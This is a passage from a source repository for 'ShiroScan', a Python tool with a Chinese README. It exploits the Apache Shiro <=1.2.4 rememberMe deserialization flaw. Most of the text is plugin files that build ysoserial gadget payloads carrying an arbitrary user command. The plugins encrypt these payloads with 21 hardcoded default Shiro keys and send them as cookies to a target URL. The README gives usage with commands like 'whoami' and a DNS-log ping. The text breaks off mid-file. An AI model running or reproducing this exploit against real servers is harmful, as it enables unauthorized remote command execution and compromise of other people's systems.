├── README.md ├── moule ├── __init__.py ├── __pycache__ │ ├── __init__.cpython-37.pyc │ └── main.cpython-37.pyc ├── main.py ├── plugins │ ├── CommonsBeanutils1.py │ ├── CommonsCollections1.py │ ├── CommonsCollections10.py │ ├── CommonsCollections2.py │ ├── CommonsCollections3.py │ ├── CommonsCollections4.py │ ├── CommonsCollections5.py │ ├── CommonsCollections6.py │ ├── CommonsCollections7.py │ ├── CommonsCollections8.py │ ├── CommonsCollections9.py │ ├── __init__.py │ └── __pycache__ │ │ ├── CommonsBeanutils1.cpython-37.pyc │ │ ├── CommonsCollections1.cpython-37.pyc │ │ ├── CommonsCollections10.cpython-37.pyc │ │ ├── CommonsCollections2.cpython-37.pyc │ │ ├── CommonsCollections3.cpython-37.pyc │ │ ├── CommonsCollections4.cpython-37.pyc │ │ ├── CommonsCollections5.cpython-37.pyc │ │ ├── CommonsCollections6.cpython-37.pyc │ │ ├── CommonsCollections7.cpython-37.pyc │ │ ├── CommonsCollections8.cpython-37.pyc │ │ ├── CommonsCollections9.cpython-37.pyc │ │ └── __init__.cpython-37.pyc └── ysoserial.jar ├── requirments.txt ├── shiro.txt └── shiro_rce.py /README.md: -------------------------------------------------------------------------------- 1 | # ShiroScan 2 | Shiro<=1.2.4反序列化,一键检测工具 3 | 4 | 改动内容:1.新增4个利用链模块(CommonsCollections7-10),预计增加成功率30%,已打包成新ysoserial的jar包,请勿更换 5 | 改动内容:2.增加多线程,虽模块增加但速度却提高300% 6 | 7 | ``` 8 | 集成21个key进行fuzz 9 | ``` 10 | 11 | * 如果有帮助,请点个star哦,对应blog文章:http://www.svenbeast.com/post/tskRKJIPg/ 12 | * pip3 install -r requirments.txt 13 | 14 | * Usage:python3 shiro.py url command 15 | * Usage:python3 shiro.py https://url.com whoami 16 | 17 | * http://www.dnslog.cn/ 验证推荐使用这个dnslog平台,速度比ceye.io要快很多 18 | * 执行的命令带空格记得用""引起来 19 | 20 | * usage:python3 shiro.py http://url.com "ping dnslog.cn" 21 | * 11个模块全部跑一遍,然后去dnslog平台查看是否收到请求,不出来就GG,也可能是因为编码还不够多 22 | 23 | * 请自行收集编码,在moule下的源代码中自行添加方法即可 24 | 25 | * 为了脚本运行简单,多线程数量不是使用者传参控制,默认20线程,如需改动请到/moule/main.py第20行代码自行修改控制线程的参数 26 | ## 不推荐当做exp使用,效率问题 27 | ## 仅供安全人员验证,测试是否存在此漏洞 28 | -------------------------------------------------------------------------------- /moule/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | from .plugins import * -------------------------------------------------------------------------------- /moule/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /moule/__pycache__/main.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/__pycache__/main.cpython-37.pyc -------------------------------------------------------------------------------- /moule/main.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | 5 | 6 | 7 | def scripts(url,command): 8 | processor = Idea() 9 | if "0-sec.org" in url or "pornhub.com" in url: 10 | print("[- ]存在敏感域名,停止检测,请使用其他工具或自行手工检测,抱歉") 11 | return False 12 | processed = processor.process(url,command) 13 | 14 | 15 | class Idea(object): 16 | PLUGINS = {} 17 | 18 | def process(self,url,command,plugins=()): 19 | if plugins is (): 20 | for plugin_name in self.PLUGINS.keys(): 21 | try: 22 | print("[*] 开始检测模块",plugin_name) 23 | self.PLUGINS[plugin_name]().process(url,command,20) 24 | except Exception as e: 25 | print(e) 26 | print ("[-]{} 检测失败,请检查网络连接或目标是否存活".format(plugin_name)) 27 | else: 28 | for plugin_name in plugins: 29 | try: 30 | print("[*]开始检测 ",self.PLUGINS[plugin_name]) 31 | self.PLUGINS[plugin_name]().process(url,command) 32 | except: 33 | print ("[-]{}检测失败,请检查网络连接或目标是否存活".format(self.PLUGINS[plugin_name])) 34 | return 35 | 36 | @classmethod 37 | def plugin_register(cls, plugin_name): 38 | def wrapper(plugin): 39 | cls.PLUGINS.update({plugin_name:plugin}) 40 | return plugin 41 | return wrapper 42 | -------------------------------------------------------------------------------- /moule/plugins/CommonsBeanutils1.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # By 斯文beast svenbeast.com 3 | 4 | import os 5 | import re 6 | import base64 7 | import uuid 8 | import subprocess 9 | import requests 10 | import sys 11 | import threadpool 12 | from Crypto.Cipher import AES 13 | from ..main import Idea 14 | requests.packages.urllib3.disable_warnings() 15 | 16 | JAR_FILE = 'moule/ysoserial.jar' 17 | 18 | @Idea.plugin_register('Class1:CommonsBeanutils1') 19 | class CommonsBeanutils1(object): 20 | def process(self,url,command, thre): 21 | self.poc(url,command, thre) 22 | 23 | def generator(self, String, fp=JAR_FILE): 24 | 25 | key_rule = re.compile('(.*?)1234url3456') 26 | url_rule = re.compile('1234url3456(.*?)1234command3456') 27 | command_rule = re.compile('1234command3456(.*?)1234sven3456') 28 | 29 | 30 | 31 | key = key_rule.findall(String)[0] 32 | target = url_rule.findall(String)[0] 33 | command = command_rule.findall(String)[0] 34 | 35 | if not os.path.exists(fp): 36 | raise Exception('jar file not found!') 37 | popen = subprocess.Popen(['java', '-jar', fp, 'CommonsBeanutils1', command], #popen 38 | stdout=subprocess.PIPE) 39 | BS = AES.block_size 40 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 41 | mode = AES.MODE_CBC 42 | iv = uuid.uuid4().bytes 43 | encryptor = AES.new(base64.b64decode(key), mode, iv) #受key影响的encryptor 44 | file_body = pad(popen.stdout.read()) #受popen影响的file_body 45 | payload = base64.b64encode(iv + encryptor.encrypt(file_body)) 46 | header={ 47 | 'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;' 48 | } 49 | try: 50 | r = requests.get(target, headers=header, cookies={'rememberMe': payload.decode()+"="},verify=False, timeout=20) # 发送验证请求1 51 | #print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode()) 52 | if(r.status_code==200): 53 | print("[+] CommonsBeanutils1模块 key: {} 已成功发送! 状态码:{}".format(str(key),str(r.status_code))) 54 | else: 55 | print("[-] CommonsBeanutils1模块 key: {} 发送异常!\n[-] 状态码:{}".format(str(key),str(r.status_code))) 56 | except Exception as e: 57 | print(e) 58 | return False 59 | 60 | def multithreading(self,funcname,url ,command, pools): 61 | 62 | key = ['kPH+bIxk5D2deZiIxcaaaA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456','2AvVhdsgUs0FSA3SDFAdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','4AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456', 63 | '3AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','Z3VucwAAAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','U3ByaW5nQmxhZGUAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456', 64 | '6ZmI6I2j5Y+R5aSn5ZOlAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','fCq+/xW488hMTCD+cmJ3aQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','1QWLxg+NYmxraMoxAXu/Iw==1234url3456'+url+'1234command3456'+command+'1234sven3456','ZUdsaGJuSmxibVI2ZHc9PQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 65 | 'L7RioUULEFhRyxM7a2R/Yg==1234url3456'+url+'1234command3456'+command+'1234sven3456','r0e3c16IdVkouZgk1TKVMg==1234url3456'+url+'1234command3456'+command+'1234sven3456','5aaC5qKm5oqA5pyvAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWluZS1hc3NldC1rZXk6QQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 66 | 'a2VlcE9uR29pbmdBbmRGaQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','WcfHGU25gNnTxTlmJMeSpw==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWljcm9zAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','MTIzNDU2Nzg5MGFiY2RlZg==1234url3456'+url+'1234command3456'+command+'1234sven3456', 67 | '5AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456'] 68 | 69 | pool = threadpool.ThreadPool(pools) 70 | requests = threadpool.makeRequests(funcname,key) 71 | [pool.putRequest(req) for req in requests] 72 | pool.wait() 73 | def poc(self,url, command, thre): 74 | 75 | self.multithreading(self.generator, url, command, thre) 76 | return False 77 | 78 | 79 | -------------------------------------------------------------------------------- /moule/plugins/CommonsCollections1.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # By 斯文beast svenbeast.com 3 | 4 | import os 5 | import re 6 | import base64 7 | import uuid 8 | import subprocess 9 | import requests 10 | import sys 11 | import threadpool 12 | from Crypto.Cipher import AES 13 | from ..main import Idea 14 | requests.packages.urllib3.disable_warnings() 15 | 16 | JAR_FILE = 'moule/ysoserial.jar' 17 | 18 | @Idea.plugin_register('Class2:CommonsCollections1') 19 | class CommonsCollections1(object): 20 | def process(self,url,command, thre): 21 | self.poc(url,command, thre) 22 | 23 | def generator(self, String, fp=JAR_FILE): 24 | 25 | key_rule = re.compile('(.*?)1234url3456') 26 | url_rule = re.compile('1234url3456(.*?)1234command3456') 27 | command_rule = re.compile('1234command3456(.*?)1234sven3456') 28 | 29 | key = key_rule.findall(String)[0] 30 | target = url_rule.findall(String)[0] 31 | command = command_rule.findall(String)[0] 32 | 33 | if not os.path.exists(fp): 34 | raise Exception('jar file not found!') 35 | popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen 36 | stdout=subprocess.PIPE) 37 | BS = AES.block_size 38 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 39 | mode = AES.MODE_CBC 40 | iv = uuid.uuid4().bytes 41 | encryptor = AES.new(base64.b64decode(key), mode, iv) #受key影响的encryptor 42 | file_body = pad(popen.stdout.read()) #受popen影响的file_body 43 | payload = base64.b64encode(iv + encryptor.encrypt(file_body)) 44 | header={ 45 | 'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;' 46 | } 47 | try: 48 | r = requests.get(target, headers=header, cookies={'rememberMe': payload.decode()+"="},verify=False, timeout=20) # 发送验证请求1 49 | #print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode()) 50 | if(r.status_code==200): 51 | print("[+] CommonsCollections1模块 key: {} 已成功发送! 状态码:{}".format(str(key),str(r.status_code))) 52 | else: 53 | print("[-] CommonsCollections1模块 key: {} 发送异常!\n[-] 状态码:{}".format(str(key),str(r.status_code))) 54 | except Exception as e: 55 | print(e) 56 | return False 57 | 58 | def multithreading(self,funcname,url ,command, pools): 59 | 60 | key = ['kPH+bIxk5D2deZiIxcaaaA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456','2AvVhdsgUs0FSA3SDFAdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','4AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456', 61 | '3AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','Z3VucwAAAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','U3ByaW5nQmxhZGUAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456', 62 | '6ZmI6I2j5Y+R5aSn5ZOlAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','fCq+/xW488hMTCD+cmJ3aQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','1QWLxg+NYmxraMoxAXu/Iw==1234url3456'+url+'1234command3456'+command+'1234sven3456','ZUdsaGJuSmxibVI2ZHc9PQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 63 | 'L7RioUULEFhRyxM7a2R/Yg==1234url3456'+url+'1234command3456'+command+'1234sven3456','r0e3c16IdVkouZgk1TKVMg==1234url3456'+url+'1234command3456'+command+'1234sven3456','5aaC5qKm5oqA5pyvAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWluZS1hc3NldC1rZXk6QQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 64 | 'a2VlcE9uR29pbmdBbmRGaQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','WcfHGU25gNnTxTlmJMeSpw==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWljcm9zAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','MTIzNDU2Nzg5MGFiY2RlZg==1234url3456'+url+'1234command3456'+command+'1234sven3456', 65 | '5AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456'] 66 | 67 | pool = threadpool.ThreadPool(pools) 68 | requests = threadpool.makeRequests(funcname,key) 69 | [pool.putRequest(req) for req in requests] 70 | pool.wait() 71 | def poc(self,url, command, thre): 72 | 73 | self.multithreading(self.generator, url, command, thre) 74 | return False 75 | 76 | 77 | -------------------------------------------------------------------------------- /moule/plugins/CommonsCollections10.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # By 斯文beast svenbeast.com 3 | 4 | import os 5 | import re 6 | import base64 7 | import uuid 8 | import subprocess 9 | import requests 10 | import sys 11 | import threadpool 12 | from Crypto.Cipher import AES 13 | from ..main import Idea 14 | requests.packages.urllib3.disable_warnings() 15 | 16 | JAR_FILE = 'moule/ysoserial.jar' 17 | 18 | @Idea.plugin_register('Class11:CommonsCollections10') 19 | class CommonsCollections10(object): 20 | def process(self,url,command, thre): 21 | self.poc(url,command, thre) 22 | 23 | def generator(self, String, fp=JAR_FILE): 24 | 25 | key_rule = re.compile('(.*?)1234url3456') 26 | url_rule = re.compile('1234url3456(.*?)1234command3456') 27 | command_rule = re.compile('1234command3456(.*?)1234sven3456') 28 | 29 | key = key_rule.findall(String)[0] 30 | target = url_rule.findall(String)[0] 31 | command = command_rule.findall(String)[0] 32 | 33 | if not os.path.exists(fp): 34 | raise Exception('jar file not found!') 35 | popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections10', command], #popen 36 | stdout=subprocess.PIPE) 37 | BS = AES.block_size 38 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 39 | mode = AES.MODE_CBC 40 | iv = uuid.uuid4().bytes 41 | encryptor = AES.new(base64.b64decode(key), mode, iv) #受key影响的encryptor 42 | file_body = pad(popen.stdout.read()) #受popen影响的file_body 43 | payload = base64.b64encode(iv + encryptor.encrypt(file_body)) 44 | header={ 45 | 'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;' 46 | } 47 | try: 48 | r = requests.get(target, headers=header, cookies={'rememberMe': payload.decode()+"="}, verify=False,timeout=20) # 发送验证请求1 49 | #print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode()) 50 | if(r.status_code==200): 51 | print("[+] CommonsCollections10模块 key: {} 已成功发送! 状态码:{}".format(str(key),str(r.status_code))) 52 | else: 53 | print("[-] CommonsCollections10模块 key: {} 发送异常!\n[-] 状态码:{}".format(str(key),str(r.status_code))) 54 | except Exception as e: 55 | print(e) 56 | return False 57 | 58 | def multithreading(self,funcname,url ,command, pools): 59 | 60 | key = ['kPH+bIxk5D2deZiIxcaaaA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456','2AvVhdsgUs0FSA3SDFAdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','4AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456', 61 | '3AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','Z3VucwAAAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','U3ByaW5nQmxhZGUAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456', 62 | '6ZmI6I2j5Y+R5aSn5ZOlAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','fCq+/xW488hMTCD+cmJ3aQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','1QWLxg+NYmxraMoxAXu/Iw==1234url3456'+url+'1234command3456'+command+'1234sven3456','ZUdsaGJuSmxibVI2ZHc9PQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 63 | 'L7RioUULEFhRyxM7a2R/Yg==1234url3456'+url+'1234command3456'+command+'1234sven3456','r0e3c16IdVkouZgk1TKVMg==1234url3456'+url+'1234command3456'+command+'1234sven3456','5aaC5qKm5oqA5pyvAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWluZS1hc3NldC1rZXk6QQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 64 | 'a2VlcE9uR29pbmdBbmRGaQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','WcfHGU25gNnTxTlmJMeSpw==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWljcm9zAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','MTIzNDU2Nzg5MGFiY2RlZg==1234url3456'+url+'1234command3456'+command+'1234sven3456', 65 | '5AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456'] 66 | 67 | pool = threadpool.ThreadPool(pools) 68 | requests = threadpool.makeRequests(funcname,key) 69 | [pool.putRequest(req) for req in requests] 70 | pool.wait() 71 | def poc(self,url, command, thre): 72 | 73 | self.multithreading(self.generator, url, command, thre) 74 | return False 75 | 76 | 77 | -------------------------------------------------------------------------------- /moule/plugins/CommonsCollections2.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # By 斯文beast svenbeast.com 3 | 4 | import os 5 | import re 6 | import base64 7 | import uuid 8 | import subprocess 9 | import requests 10 | import sys 11 | import threadpool 12 | from Crypto.Cipher import AES 13 | from ..main import Idea 14 | requests.packages.urllib3.disable_warnings() 15 | 16 | JAR_FILE = 'moule/ysoserial.jar' 17 | 18 | @Idea.plugin_register('Class3:CommonsCollections2') 19 | class CommonsCollections2(object): 20 | def process(self,url,command, thre): 21 | self.poc(url,command, thre) 22 | 23 | def generator(self, String, fp=JAR_FILE): 24 | 25 | key_rule = re.compile('(.*?)1234url3456') 26 | url_rule = re.compile('1234url3456(.*?)1234command3456') 27 | command_rule = re.compile('1234command3456(.*?)1234sven3456') 28 | 29 | key = key_rule.findall(String)[0] 30 | target = url_rule.findall(String)[0] 31 | command = command_rule.findall(String)[0] 32 | 33 | if not os.path.exists(fp): 34 | raise Exception('jar file not found!') 35 | popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections2', command], #popen 36 | stdout=subprocess.PIPE) 37 | BS = AES.block_size 38 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 39 | mode = AES.MODE_CBC 40 | iv = uuid.uuid4().bytes 41 | encryptor = AES.new(base64.b64decode(key), mode, iv) #受key影响的encryptor 42 | file_body = pad(popen.stdout.read()) #受popen影响的file_body 43 | payload = base64.b64encode(iv + encryptor.encrypt(file_body)) 44 | header={ 45 | 'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;' 46 | } 47 | try: 48 | r = requests.get(target, headers=header, cookies={'rememberMe': payload.decode()+"="}, verify=False,timeout=20) # 发送验证请求1 49 | #print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode()) 50 | if(r.status_code==200): 51 | print("[+] CommonsCollections2模块 key: {} 已成功发送! 状态码:{}".format(str(key),str(r.status_code))) 52 | else: 53 | print("[-] CommonsCollections2模块 key: {} 发送异常!\n[-] 状态码:{}".format(str(key),str(r.status_code))) 54 | except Exception as e: 55 | print(e) 56 | return False 57 | 58 | def multithreading(self,funcname,url ,command, pools): 59 | 60 | key = ['kPH+bIxk5D2deZiIxcaaaA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456','2AvVhdsgUs0FSA3SDFAdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','4AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456', 61 | '3AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','Z3VucwAAAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','U3ByaW5nQmxhZGUAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456', 62 | '6ZmI6I2j5Y+R5aSn5ZOlAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','fCq+/xW488hMTCD+cmJ3aQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','1QWLxg+NYmxraMoxAXu/Iw==1234url3456'+url+'1234command3456'+command+'1234sven3456','ZUdsaGJuSmxibVI2ZHc9PQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 63 | 'L7RioUULEFhRyxM7a2R/Yg==1234url3456'+url+'1234command3456'+command+'1234sven3456','r0e3c16IdVkouZgk1TKVMg==1234url3456'+url+'1234command3456'+command+'1234sven3456','5aaC5qKm5oqA5pyvAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWluZS1hc3NldC1rZXk6QQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 64 | 'a2VlcE9uR29pbmdBbmRGaQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','WcfHGU25gNnTxTlmJMeSpw==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWljcm9zAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','MTIzNDU2Nzg5MGFiY2RlZg==1234url3456'+url+'1234command3456'+command+'1234sven3456', 65 | '5AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456'] 66 | 67 | pool = threadpool.ThreadPool(pools) 68 | requests = threadpool.makeRequests(funcname,key) 69 | [pool.putRequest(req) for req in requests] 70 | pool.wait() 71 | def poc(self,url, command, thre): 72 | 73 | self.multithreading(self.generator, url, command, thre) 74 | return False 75 | 76 | 77 | -------------------------------------------------------------------------------- /moule/plugins/CommonsCollections3.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # By 斯文beast svenbeast.com 3 | 4 | import os 5 | import re 6 | import base64 7 | import uuid 8 | import subprocess 9 | import requests 10 | import sys 11 | import threadpool 12 | from Crypto.Cipher import AES 13 | from ..main import Idea 14 | requests.packages.urllib3.disable_warnings() 15 | 16 | JAR_FILE = 'moule/ysoserial.jar' 17 | 18 | @Idea.plugin_register('Class4:CommonsCollections3') 19 | class CommonsCollections3(object): 20 | def process(self,url,command, thre): 21 | self.poc(url,command, thre) 22 | 23 | def generator(self, String, fp=JAR_FILE): 24 | 25 | key_rule = re.compile('(.*?)1234url3456') 26 | url_rule = re.compile('1234url3456(.*?)1234command3456') 27 | command_rule = re.compile('1234command3456(.*?)1234sven3456') 28 | 29 | key = key_rule.findall(String)[0] 30 | target = url_rule.findall(String)[0] 31 | command = command_rule.findall(String)[0] 32 | 33 | if not os.path.exists(fp): 34 | raise Exception('jar file not found!') 35 | popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections3', command], #popen 36 | stdout=subprocess.PIPE) 37 | BS = AES.block_size 38 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 39 | mode = AES.MODE_CBC 40 | iv = uuid.uuid4().bytes 41 | encryptor = AES.new(base64.b64decode(key), mode, iv) #受key影响的encryptor 42 | file_body = pad(popen.stdout.read()) #受popen影响的file_body 43 | payload = base64.b64encode(iv + encryptor.encrypt(file_body)) 44 | header={ 45 | 'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;' 46 | } 47 | try: 48 | r = requests.get(target, headers=header, cookies={'rememberMe': payload.decode()+"="},verify=False, timeout=20) # 发送验证请求1 49 | #print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode()) 50 | if(r.status_code==200): 51 | print("[+] CommonsCollections3模块 key: {} 已成功发送! 状态码:{}".format(str(key),str(r.status_code))) 52 | else: 53 | print("[-] CommonsCollections3模块 key: {} 发送异常!\n[-] 状态码:{}".format(str(key),str(r.status_code))) 54 | except Exception as e: 55 | print(e) 56 | return False 57 | 58 | def multithreading(self,funcname,url ,command, pools): 59 | 60 | key = ['kPH+bIxk5D2deZiIxcaaaA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456','2AvVhdsgUs0FSA3SDFAdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','4AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456', 61 | '3AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','Z3VucwAAAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','U3ByaW5nQmxhZGUAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456', 62 | '6ZmI6I2j5Y+R5aSn5ZOlAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','fCq+/xW488hMTCD+cmJ3aQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','1QWLxg+NYmxraMoxAXu/Iw==1234url3456'+url+'1234command3456'+command+'1234sven3456','ZUdsaGJuSmxibVI2ZHc9PQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 63 | 'L7RioUULEFhRyxM7a2R/Yg==1234url3456'+url+'1234command3456'+command+'1234sven3456','r0e3c16IdVkouZgk1TKVMg==1234url3456'+url+'1234command3456'+command+'1234sven3456','5aaC5qKm5oqA5pyvAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWluZS1hc3NldC1rZXk6QQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 64 | 'a2VlcE9uR29pbmdBbmRGaQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','WcfHGU25gNnTxTlmJMeSpw==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWljcm9zAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','MTIzNDU2Nzg5MGFiY2RlZg==1234url3456'+url+'1234command3456'+command+'1234sven3456', 65 | '5AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456'] 66 | 67 | pool = threadpool.ThreadPool(pools) 68 | requests = threadpool.makeRequests(funcname,key) 69 | [pool.putRequest(req) for req in requests] 70 | pool.wait() 71 | def poc(self,url, command, thre): 72 | 73 | self.multithreading(self.generator, url, command, thre) 74 | return False 75 | 76 | 77 | -------------------------------------------------------------------------------- /moule/plugins/CommonsCollections4.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # By 斯文beast svenbeast.com 3 | 4 | import os 5 | import re 6 | import base64 7 | import uuid 8 | import subprocess 9 | import requests 10 | import sys 11 | import threadpool 12 | from Crypto.Cipher import AES 13 | from ..main import Idea 14 | requests.packages.urllib3.disable_warnings() 15 | 16 | JAR_FILE = 'moule/ysoserial.jar' 17 | 18 | @Idea.plugin_register('Class5:CommonsCollections4') 19 | class CommonsCollections4(object): 20 | def process(self,url,command, thre): 21 | self.poc(url,command, thre) 22 | 23 | def generator(self, String, fp=JAR_FILE): 24 | 25 | key_rule = re.compile('(.*?)1234url3456') 26 | url_rule = re.compile('1234url3456(.*?)1234command3456') 27 | command_rule = re.compile('1234command3456(.*?)1234sven3456') 28 | 29 | key = key_rule.findall(String)[0] 30 | target = url_rule.findall(String)[0] 31 | command = command_rule.findall(String)[0] 32 | 33 | if not os.path.exists(fp): 34 | raise Exception('jar file not found!') 35 | popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections4', command], #popen 36 | stdout=subprocess.PIPE) 37 | BS = AES.block_size 38 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 39 | mode = AES.MODE_CBC 40 | iv = uuid.uuid4().bytes 41 | encryptor = AES.new(base64.b64decode(key), mode, iv) #受key影响的encryptor 42 | file_body = pad(popen.stdout.read()) #受popen影响的file_body 43 | payload = base64.b64encode(iv + encryptor.encrypt(file_body)) 44 | header={ 45 | 'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;' 46 | } 47 | try: 48 | r = 